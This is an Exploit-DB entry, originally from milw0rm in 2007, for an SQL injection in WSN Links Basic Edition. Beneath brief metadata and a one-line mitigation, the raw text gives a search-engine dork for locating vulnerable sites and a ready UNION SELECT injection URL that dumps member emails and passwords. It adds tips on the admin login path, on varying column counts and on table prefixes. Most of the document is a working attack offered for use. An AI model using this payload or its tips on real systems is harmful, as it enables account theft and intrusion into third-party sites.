WSN Links Basic Edition SQL Injection Vulnerability

vendor:

Links Basic Edition

by:

t0pP8uZz & xprog

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Links Basic Edition

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

WSN Links Basic Edition SQL Injection Vulnerability

The vulnerability allows an attacker to pull out member info from the database by executing a malicious SQL query.

Mitigation:

Apply proper input validation and parameterized queries to prevent SQL injection.

Source

Exploit-DB raw data:

--==+================================================================================+==--
--==+		    WSN Links Basic Edition SQL Injection Vulnerbility	             +==--
--==+================================================================================+==--



AUTHOR: t0pP8uZz & xprog
SITE: wsnforum.com
DORK: Google: intext:"Powered by WSN Links Basic Edition"     Altavista: "Powered by WSN Links Basic Edition"


DESCRIPTION: 
pull out member info from the database


EXPLOITS:
http://www.server.com/Script_Dir/index.php?action=displaycat&catid=1/**/and/**/1=2/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,concat(email,0x3a,password),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35/**/FROM/**/wsnlinks_members/**/LIMIT/**/0,1/*


NOTE/TIP: 
admin login is at Script_Dir/adminlogin.php usually the first user is admin
also the amount of 'columns' may differ althou its normally 35 or 28.
the script also uses table prefix, the most used are wsnlinks and wsn so that would make the table wsn_members ect.


GREETZ: milw0rm.com, H4CKY0u.org, G0t-Root.net !



--==+================================================================================+==--
--==+		    WSN Links Basic Edition SQL Injection Vulnerbility	             +==--
--==+================================================================================+==--

# milw0rm.com [2007-07-21]